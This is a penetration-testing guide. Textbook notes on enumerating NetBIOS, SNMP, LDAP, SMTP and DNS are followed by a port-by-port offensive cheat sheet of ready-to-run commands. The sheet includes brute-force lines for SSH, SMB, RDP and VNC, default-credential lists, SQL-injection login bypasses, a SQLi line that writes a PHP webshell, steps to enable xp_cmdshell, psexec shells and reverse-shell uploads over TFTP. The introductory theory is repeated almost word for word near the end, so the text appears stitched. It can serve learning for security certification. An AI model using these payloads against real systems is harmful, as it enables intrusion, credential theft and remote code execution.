4. Enumeration
After finding a vulnerability you will exploit it by enumeration. Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target. The gathered information is used to identify the vulnerabilities or weak points in system security and tries to exploit in the System gaining phase.
Types of information enumerated by intruders:
Network Resource and shares
Users and Groups
Routing tables
Auditing and Service settings
Machine names
Applications and banners
SNMP and DNS details
Techniques for Enumeration
Extracting user names using email ID's
Extract information using the default password
Brute Force Active Directory
Extract user names using SNMP
Extract user groups from Windows
Extract information using DNS Zone transfer
Services and Port to Enumerate
TCP 53: DNS Zone transfer
TCP 135: Microsoft RPC Endpoint Mapper
TCP 137: NetBIOS Name Service
TCP 139: NetBIOS session Service (SMB over NetBIOS)
TCP 445: SMB over TCP (Direct Host)
UDP 161: SNMP
TCP/UDP 389: LDAP
TCP/UDP 3368: Global Catalog Service
TCP 25: Simple Mail Transfer Protocol (SMTP)
NetBIOS Enumeration
NetBIOS stands for Network Basic Input Output System. It Allows computer communication over a LAN and allows them to share files and printers.
NetBIOS names are used to identify network devices over TCP/IP (Windows). It must be unique on a network, limited to 16 characters where 15 characters are used for the device name and the 16th character is reserved for identifying the type of service running or name record type.
Attackers use the NetBIOS enumeration to obtain:
List of computers that belong to a domain
List of shares on the individual hosts on the network
Policies and passwords
Commands and tools used:
Nbtstat: utility used to find protocol statistics, NetBIOS name table and name cache details
Superscan: GUI tool used to enumerate windows machine
Net view: command line tool to identify shared resources on a network
SNMP Enumeration
SNMP (Simple Network Management Protocol) is an application layer protocol which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network. SNMP is a very common protocol found enabled on a variety of operating systems like Windows Server, Linux & UNIX servers as well as network devices like routers, switches etc.
SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system.
It consists of three major components:
Managed Device: A managed device is a device or a host (technically known as a node) which has the SNMP service enabled. These devices could be routers, switches, hubs, bridges, computers etc.
Agent: An agent can be thought of as a piece of software that runs on a managed device. Its primary job is to convert the information into SNMP compatible format for the smooth management of the network using SNMP protocol.
Network Management System (NMS): These are the software systems that are used for monitoring of the network devices.
An agent running on every SNMP device will be providing access to a read and writable database. The database is referred to as the management information base (MIB) which is organized hierarchically and is a virtual database containing a formal description of all the network objects identified by a specific object identifier (OID) that can be managed using SNMP. It's a giant repository of values and settings. There is a manager involved in the process, and the manager will query the agent for various details.
Community strings is a text string used to authenticate communications between the management stations and network devices on which SNMP agents are hosted. Community Strings travel in clear text over the network, hence are subject to network sniffing attacks. Community Strings are sent with every network packet exchanged between the node and management station.
Two types of community strings:
Read only: This mode permits querying the device and reading the information, but does not permit any kind of changes to the configuration. The default community string for this mode is “public.”
Read Write: In this mode, changes to the device are permitted; hence if one connects with this community string, we can even modify the remote device ’s configurations. The default community string for this mode is “private.”
when the community strings are left at the default settings, attackers take the opportunity and find the loopholes in it.
Few tools:
OpUtils Network Monitoring Toolset - http://www.manageengine.com
SolarWinds ( best SNMP enumeration tool) - www.solarwinds.com
command line tools: SNMP-WALK, SNMP-CHECK
Countermeasures:
Remove or disable SNMP agents on hosts
Block port 161 at all perimeter network access devices
Restrict access to specific IP addresses
Use SNMPv3 (more secure)
Implement the Group Policy security option called "Additional restrictions for anonymous connections"
Access to null session pipes, null session shares, and IPsec filtering should also be restricted
LDAP Enumeration
The Lightweight Directory Access Protocol is a protocol used to access directory listings within Active Directory or from other Directory Services. A directory is usually compiled in a hierarchical and logical format, rather like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and like other protocols tends to usually conform to a distinct set of rules (RFC's). It is possible to query the LDAP service, sometimes anonymously to determine a great deal of information that could glean the tester, valid usernames, addresses, departmental details that could be utilised in a brute force or social engineering attack.
Tools:
Jxplorer - http://www.jxplorer.org/
LDAP Admin Tool - http://www.ldapsoft.com
Countermeasures:
Use NTLM or Basic authentication to limit access to known users only.
By default, LDAP traffic is transmitted unsecured; use SSL technology to encrypt the traffic.
Select a username different from your email address and enable account lockout.
NTP Enumeration
The Network Time Protocol is a protocol for synchronizing time across your network, this is especially important when utilizing Directory Services. There exists a number of time servers throughout the world that can be used to keep systems synced to each other. NTP utilizes UDP port 123. Through NTP enumeration you can gather information such as lists of hosts connected to NTP server, IP addresses, system names, and OSs running on the client system in a network. All this information can be enumerated by querying NTP server
SMTP Enumeration
The Simple Mail Transport Protocol is used to send email messages as opposed to POP3 or IMAP which can be used to both send and receive messages. SMTP relies on using Mail Exchange (MX) servers to direct the mail to via the Domain Name Service, however, should an MX server not be detected, SMTP will revert and try an A or alternatively SRV records. SMTP generally runs on port 25.
SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help built-in SMTP commands, they are
VRFY - This command is used for validating users.
EXPN - This command tells the actual delivery address of aliases and mailing lists.
RCPT TO - It defines the recipients of the message.
Tool:
NestScanTools Pro
Countermeasures:
Configure SMTP server either to ignore email messages to unknown recipients.
Don’t include information like mail relay systems being used, Internal IP address or host information.
Disable open relay feature.
DNS Enumeration
DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield usernames, computer names, and IP addresses of potential target systems. The list of DNS record provides an overview of types of resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses.
DNS Zone Transfer used to replicate DNS data across a number of DNS servers or to back up DNS files. A user or server will perform a specific zone transfer request from a ―name server. If the name server allows zone transfers by an anonymous user to occur, all the DNS names and IP addresses hosted by the name server will be returned in human-readable ASCII text.
Tools:
nslookup
maltego
dnenum
dnsrecon
Countermeasures:
Disable Zone transfer by untrusted hosts
Ensure that private hostnames are not referenced to IP addresses within the DNS zone files of publicly accessible DNS servers.
Use premium registration services.
Scanning
NMAP TCP quick
> sudo nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap IP
NMAP TCP Full
> sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN tcp-full.nmap -sV IP
NMAP TCP - Repeat if extra ports found
> sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p PORTS IP
NMAP UDP quick
> sudo nmap -Pn -v -sU -sV --top-ports=30 -oN udp-quick.nmap IP
NMAP UDP 1000
> sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T4 -oN udp-1000.nmap IP
NMAP UDP - Repeat if extra ports found
> sudo nmap -Pn -sU -A -oN udp-extra.nmap -p PORTS IP
Enumeration
FTP - Port 21
Check for FTP version vulns
Check for Anonymous login
Check for Read access
Check for Web root or root directories of any other accessible service
Check for write access
SSH - Port 22
Check for SSH version vulns
Check for User enumeration if necessary
Check if host key was seen somewhere else
Check if it prompts for a password - means password login is allowed for some users
nmap -sV --script=ssh-hostkey -p22 IP
Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar, MSF (if port gets filtered, there's defense mechanisms - fail2ban)
Telnet - Port 23
Connect and check for service running
SMTP - Port 25
Check for SMTP vulns Check version with HELO / HELLO
POP - PORT 110
Connect using telnet
user <username>
pass <pass>
LIST - to list emails
RETR <email numbr> - To retrieve emails
DNS - Port 53
Might indicate a domain controller on Windows
Check for zone transfer -
Kerberos - Port 88
Indication that its a DC
Netbios - Port 139
> nmblookup -A IP
> nbtscan IP
> On older hosts, this port servers SMB / SAMBA, scan by adding 'client min protocol = LANMAN1' to GLOBAL setting in /etc/samba/smb.conf or by using --option='client min protocol'=LANMAN1 with smbclient
RPC - PORT 135
> sudo nmap -sS -Pn -sV --script=rpcinfo.nse -p135 0
> rpcinfo IP
> rpcclient -U "" -N [ip]
LDAP - Ports 389,636,3268,326
> sudo nmap -sS -Pn -sV --script=ldap* -p389,636,3268,3269
WEB - PORT 80 / 443
NMAP Web
> sudo nmap -Pn -sC -p80,443
Checks
Browse the webapp
Check for usernames, keywords
Check Web server vulns
Check for Cgi's shellshock
Check Certificates for hostname
Check robots.txt
Check sitemap.xml
Check for known software - View source
Check for default credentials
Check for input validation - SQLi
Check for OS Command execution
Check for LFI / RFI
Dirb
> dirb IP
> dirb with -X extensions based on web technology, .php,.asp,.txt,.jsp
> dirb IP -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'
Gobuster
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -k -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'
Nikto
> nikto -host IP
SMB - Ports
NMAP vuln scripts
> sudo nmap -Pn --script=smb-proto* -p139,445
> sudo nmap -Pn --script=smb-os-discovery.nse -p139,445
> sudo nmap -Pn --script=smb-enum* -p139,445
> sudo nmap -Pn --script=smb-vuln* -p139,445
> nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse
Check for Null logins
> nmap --script smb-enum-shares -p 139,445
> smbclient -L \\\\ip\\ -N
> smbclient -m=SMB2 -L \\\\Hostname\\ -N
Connect to a share with Null session
> smbclient \\\\IP\\$Admin -N
> smbmap -H IP
> smbmap -u DoesNotExists -H IP
> enum4linux -a IP
Check permissions on a connect share
> smb: \> showacls # enable acl listing
> smb: \> dir # list directories with acls
Mount share on local machine
> sudo mount -t cifs //10.10.10.134/SHARENAME ~/path/to/mount_directory
List share with credentials
> smbmap -u USERNAME -p PASSWORD -d DOMAIN.TLD -H <TARGET-IP>
Recursively list all files in share
> smbmap -R -H <TARGET-IP>
> smbmap -R Replication -H <TARGET-IP>
With smbclient (recurse downloads all files)
> smbclient //<TARGET-IP>/Replication
> smb: \> recurse ON
> smb: \> prompt OFF
> smb: \> mget *
Upload / Download specific files
> smbmap -H <TARGET-IP> --download 'Replication\active.htb\
> smbmap -H <TARGET-IP> --upload test.txt SHARENAME/test.txt
NFS - Port 2049
> showmount -e IP
> mount -t nfs -o vers=3 10.1.1.1:/home/ ~/home
> mount -t nfs4 -o proto=tcp,port=2049 127.0.0.1:/srv/Share mountpoint
TFTPD - UDP 69
> tftp client to connect
> atftp is a better client
> Can be used to read system files, MSSQL password mdf file
Finding exploits
Search on EDB and searchsploit
Check each service on CVE details for RCE / LFI / RFI / SQLI issues
Google search the with the service banner
NETWORK ENUMERATION
Network enum - Ports
A quick checklist for possible attack vectors through the different ports
TCP
21 - FTP
Checks
Check if you have anonymous access
Check if you can upload a file to trigger a webshell through the webapp
Check if you can download backup files to extract included passwords
Check the version of FTP for exploits
Commands
Login to ftp server (for anonymous access, use "anonymous":"anonymous")
ftp $ip
FTP specific nmap scan
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Tip: Before starting scans, set a bash variable to the IP address you are scanning likeip=10.11.1.1.Then the $ip value in the commands of this cheat sheet will be filled in automatically.
22 - SSH
Checks
Try easy username-password combinations
Check for username enumeration vulnerabilities
Check version for vulnerabilities
(Only when getting desperate) Try brute force with Hydra, Medussa, ...
Commands
Nmap scan
nmap -p 22000 -sV -Pn -T4 --script=ssh* $ip
Brute force
hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh
Connect through found key
#make key only accessible by the current user
chmod 0600 private.key
ssh user@$ip -i user.key
25 - SMTP
Checks
Check for user enumeration
Check version for exploits
Commands
nmap scan
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
user enumeration
#manual way
nc -nvv $ip 25
VRFY root
(exists if user is replied as "250 Georgia<Georgia@>")
(doesn't exist if user is replied as "551 user not local")
#automated way
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
80/443 - HTTP(S)
Checks
Login portals
try the default credentials off the application
try usernames already seen throughout the application or in other services like SMTP
try SQL injection bypasses
try registering a new user
brute force with hydra, medusa, ...
Check robots.txt for hidden directories
Brute force directories to find hidden content
Check for passwords/URLs/versions/... in comments of web app
Check version numbers for known exploits
Check changelog for version information
Estimate version based on copyright date (if not automatically adjusted)
Check if specific CMS is used like WordPress and then use platform specific scanners
ways to RCE
check for file upload functionalities (if uploads are filtered, try alternative extensions)
execute commands through SQLi
Shellshock
command injection
trigger injected code through path traversal
Enumeration scans
Directory brute force
#start of with general scan
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50
#add extensions
gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500"
nmap scan
nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip
webdav scanning
davtest --url http://$ip
davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver http://$ip:8080/webdav/
Nikto scans
nikto -host $ip | tee nikto.log
Login portals
brute force login portals
#basic auth
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
#login form
hydra -L users.txt -P users.txt $ip http-post-form "<directory>:login_username=^USER^&secretkey=^PASS^&<rest of post request>:<error message>"
#create custom password list
cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl
Standard credentials you should try when being blocked by login portal
admin:admin
admin:password
admin:administrator
admin:(name of box)
user:user
user:password
user:12345
guest:guest
root:root
(name of box):(name of box)
(default account):(name of application)
Try SQL injections to bypass the login form
' or 1=1;--
' or '1'='1
' or 1=1;#
') or ('x'='x
' or <column> like '%';--
' or 1=1 LIMIT 1;--
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—
' or 1/*
*/ =1 --
admin' or 'a'='a
'#
File upload
Try alternative extensions for file uploads
Php > upload as pHp / phP / test.php.jpg /
php - phtml, .php, .php3, .php4, .php5, and .inc
asp - asp, .aspx
perl - .pl, .pm, .cgi, .lib
jsp - .jsp, .jspx, .jsw, .jsv, and .jspf
Coldfusion - .cfm, .cfml, .cfc, .dbm
File traversal list
Path Traversal Cheat Sheet: Windows | GracefulSecurity
gracefulsecurity.com
RCE through SQLi
#Through file creation
union all select "<?php echo shell_exec($_GET['cmd']);?>",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
#if running as database admin, use xp_cmdshell
http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
'; exec master.dbo.xp_cmdshell 'command'
#On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1;--
RECONFIGURE;--
EXEC sp_configure 'xp_cmdshell', 1;--
RECONFIGURE;--
#On MSSQL 2000:
EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
If you use exploits for web apps but they don't work as expected: proxy network traffic through burp and see the sent requests
110 - POP3
Checks
Check version for exploits
Check mails for the presence of credentials
Commands
manually login to the application
#connect and check for banner
telnet $ip 110
#guess login credentials
USER pelle
PASS admin
#list all emails
list
#retrieve email number 5 for example
retr 5
111 - NFS/RPC
Checks
Check for passwords in files on mountable drives
Commands
#check general rpc info
rpcinfo $ip
#Check what shares you can mount
showmount -e $ip
#mounting the share
#make the directory
mkdir /mnt/share
#mount the share
mount -t nfs $ip:/share /mnt/share -nolock
Keep mountable shares in mind as they might be used in root squashing attacks to elevate your privileges to root.
139/445 - SMB
Checks
Check for null sessions
Check the permissions of users you already have
Check for passwords in files
Attempt brute force on enumerated users
Check for EternalBlue
Check samba version (if Linux)
Commands (Automated)
nmap scan
#general scan
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445
#vulnerability scan
nmap --script smb-vuln* -p 445 -oA nmap_smb_vulns $ip
Check samba versions
#save code below as samba_version.sh and make it executable
./samba_version.sh
if [ -z $1 ]; then echo "Usage: ./samba_version.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$$"
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""
enum4linux
enum4linux -a $ip
smbmap
#list general folders
smbmap -H $ip
#recursively list dirs and files
smbmap -R $sharename -H $ip
smbmap -R "Users" -H $ip -u Guest
#download a file
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
CrackMapExec
#check if you can connect through null sessions (check what rights you have on the shares)
cme smb $ip -u '' -p '' --shares
cme smb $ip -u '' -p '' --shares --port 139
#enumerate the users
#rid brute forcing
cme smb $ip -u "" -p "" --rid-brute
#active sessions
cme smb $ip -u '' -p '' --loggedon-users
#users in general
cme smb $ip -u '' -p '' --users
#enumerate the groups
#local groups
cme smb $ip -u '' -p '' --local-groups
#domain groups
cme smb $ip -u '' -p '' --groups
#check for the password policy
cme smb $ip -u "" -p "" --pass-pol
mount shares and inspect files manually
#smbclient
smbclient -L $ip
smbclient //$ip/tmp
smbclient \\\\192.168.1.105\\ipc$ -U john
smbclient //$ip/ipc$ -U john
#mounting the share
mkdir /mnt/targetshare
mount -t cifs \\172.16.20.88\ipc$ -o username=[username] /mnt/targetshare
brute force smb
hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f
#in OSCP the passwords are often equal to the username
hydra -L usernames.txt -P usernames.txt $ip smb -V -f
Gaining shell through psexec (user needs to be admin)
#copy script
cp /usr/share/doc/python-impacket/examples/psexec.py .
#specific command test
python psexec.py <username>:<pass>@10.11.1.227 whoami
#shell
rlwrap python psexec.py <username>:<pass>@10.11.1.227
#NOTE: be carefull with exclamation marks in passwords: rottenadmin:P@ssword123\!@192.168.194.140
#through crackmapexec (didn't always work for me)
cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami
1433 - MSSQL
Checks
Try default credentials "sa:password"
Brute force creds
Check database content for new passwords
Check version for exploits
RCE
through xp_cmdshell functionality
through injecting payload in output file, placing it in webroot and triggering it through webapp
Commands
nmap
nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -o 1433_nmap_mssql
credential brute force
nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip
manually logging in and gaining shell
#login
sqsh -S $ip -U sa -P password
sqsh -S $ip:27900 -U sa -P password
#execute commands
xp_cmdshell 'date'
go
3306 - MySQL
Checks
Try default credentials "root":""
Brute force credentials
Check database content for new passwords
Check version for exploits
Commands
nmap
nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -o 3306_nmap_mysql $ip
try default password
mysql --host=$ip -u root -p
3389 - RDP
Checks
Check if you can login with default guest account and blank password
Check if you can brute force users
Check for BlueKeep
Commands
nmap
nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -o 3389_nmap_rdp
manually login
rdesktop $ip
#Try default guest account "guest":""
rdesktop -u guest $ip -g 94%
Start brute force
ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip
5900 - VNC
Checks
check for easy VNC passwords
check for exploits for VNC version
brute force VNC password
Commands
nmap
nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC
VNC brute force on base password
hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc
UDP
53 - DNS
Checks
Try zone transfer
Brute force subdomains
Commands
do DNS lookup specifying the DNS server
nslookup
#set nameserver to ip of box
> server 10.10.10.13
#ask for dns of box ip address
> 10.10.10.13
subdomain enumeration / brute force
dig axfr @$ip test.htb
fierce -dns ext.recon.lan -dnsserver 172.16.90.53
gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
69 - TFTP
Checks
search for files to find sensitive info like passwords
upload shells to trigger them in web app
Commands
nmap
nmap -sU -p 69 --script tftp-enum.nse $ip
Interact with TFTP protocol
#setup the connection
tftp 172.16.200.100
#get a file
tftp> get /etc/passwd
#upload reverse shell
tftp> put shell.php
automated search sensitive files (Metasploit)
msfconsole
use tftpbrute
set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
161 - SNMP
Checks
Try the default community strings 'public' and 'private'
Enumerate version of OS/ users /processes
Commands
nmap
nmap -sU -p161 --script "snmp-*" $ip
scan range of ip addresses for snmp strings
#only try "public" and "private"
onesixtyone -i targets.list
#try 100+ community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip
enumerate information with known community string
# enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# enumerates running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.
Types of information enumerated by intruders:
Network Resource and shares
Users and Groups
Routing tables
Auditing and Service settings
Machine names
Applications and banners
SNMP and DNS details
Techniques for Enumeration
Extracting user names using email ID's
Extract information using the default password
Brute Force Active Directory
Extract user names using SNMP
Extract user groups from Windows
Extract information using DNS Zone transfer
Services and Port to Enumerate
TCP 53: DNS Zone transfer
TCP 135: Microsoft RPC Endpoint Mapper
TCP 137: NetBIOS Name Service
TCP 139: NetBIOS session Service (SMB over NetBIOS)
TCP 445: SMB over TCP (Direct Host)
UDP 161: SNMP
TCP/UDP 389: LDAP
TCP/UDP 3368: Global Catalog Service
TCP 25: Simple Mail Transfer Protocol (SMTP)
NetBIOS Enumeration
NetBIOS stands for Network Basic Input Output System. It Allows computer communication over a LAN and allows them to share files and printers.
NetBIOS names are used to identify network devices over TCP/IP (Windows). It must be unique on a network, limited to 16 characters where 15 characters are used for the device name and the 16th character is reserved for identifying the type of service running or name record type.
Attackers use the NetBIOS enumeration to obtain:
List of computers that belong to a domain
List of shares on the individual hosts on the network
Policies and passwords
Commands and tools used:
Nbtstat: utility used to find protocol statistics, NetBIOS name table and name cache details
Superscan: GUI tool used to enumerate windows machine
Net view: command line tool to identify shared resources on a network
SNMP Enumeration
SNMP (Simple Network Management Protocol) is an application layer protocol which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network. SNMP is a very common protocol found enabled on a variety of operating systems like Windows Server, Linux & UNIX servers as well as network devices like routers, switches etc.
SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system.
It consists of three major components:
Managed Device: A managed device is a device or a host (technically known as a node) which has the SNMP service enabled. These devices could be routers, switches, hubs, bridges, computers etc.
Agent: An agent can be thought of as a piece of software that runs on a managed device. Its primary job is to convert the information into SNMP compatible format for the smooth management of the network using SNMP protocol.
Network Management System (NMS): These are the software systems that are used for monitoring of the network devices.
An agent running on every SNMP device will be providing access to a read and writable database. The database is referred to as the management information base (MIB) which is organized hierarchically and is a virtual database containing a formal description of all the network objects identified by a specific object identifier (OID) that can be managed using SNMP. It's a giant repository of values and settings. There is a manager involved in the process, and the manager will query the agent for various details.
Community strings is a text string used to authenticate communications between the management stations and network devices on which SNMP agents are hosted. Community Strings travel in clear text over the network, hence are subject to network sniffing attacks. Community Strings are sent with every network packet exchanged between the node and management station.
Two types of community strings:
Read only: This mode permits querying the device and reading the information, but does not permit any kind of changes to the configuration. The default community string for this mode is “public.”
Read Write: In this mode, changes to the device are permitted; hence if one connects with this community string, we can even modify the remote device ’s configurations. The default community string for this mode is “private.”
when the community strings are left at the default settings, attackers take the opportunity and find the loopholes in it.
Few tools:
OpUtils Network Monitoring Toolset - http://www.manageengine.com
SolarWinds ( best SNMP enumeration tool) - www.solarwinds.com
command line tools: SNMP-WALK, SNMP-CHECK
Countermeasures:
Remove or disable SNMP agents on hosts
Block port 161 at all perimeter network access devices
Restrict access to specific IP addresses
Use SNMPv3 (more secure)
Implement the Group Policy security option called "Additional restrictions for anonymous connections"
Access to null session pipes, null session shares, and IPsec filtering should also be restricted
LDAP Enumeration
The Lightweight Directory Access Protocol is a protocol used to access directory listings within Active Directory or from other Directory Services. A directory is usually compiled in a hierarchical and logical format, rather like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and like other protocols tends to usually conform to a distinct set of rules (RFC's). It is possible to query the LDAP service, sometimes anonymously to determine a great deal of information that could glean the tester, valid usernames, addresses, departmental details that could be utilised in a brute force or social engineering attack.
Tools:
Jxplorer - http://www.jxplorer.org/
LDAP Admin Tool - http://www.ldapsoft.com
Countermeasures:
Use NTLM or Basic authentication to limit access to known users only.
By default, LDAP traffic is transmitted unsecured; use SSL technology to encrypt the traffic.
Select a username different from your email address and enable account lockout.
NTP Enumeration
The Network Time Protocol is a protocol for synchronizing time across your network, this is especially important when utilizing Directory Services. There exists a number of time servers throughout the world that can be used to keep systems synced to each other. NTP utilizes UDP port 123. Through NTP enumeration you can gather information such as lists of hosts connected to NTP server, IP addresses, system names, and OSs running on the client system in a network. All this information can be enumerated by querying NTP server
SMTP Enumeration
The Simple Mail Transport Protocol is used to send email messages as opposed to POP3 or IMAP which can be used to both send and receive messages. SMTP relies on using Mail Exchange (MX) servers to direct the mail to via the Domain Name Service, however, should an MX server not be detected, SMTP will revert and try an A or alternatively SRV records. SMTP generally runs on port 25.
SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help built-in SMTP commands, they are
VRFY - This command is used for validating users.
EXPN - This command tells the actual delivery address of aliases and mailing lists.
RCPT TO - It defines the recipients of the message.
Tool:
NestScanTools Pro
Countermeasures:
Configure SMTP server either to ignore email messages to unknown recipients.
Don’t include information like mail relay systems being used, Internal IP address or host information.
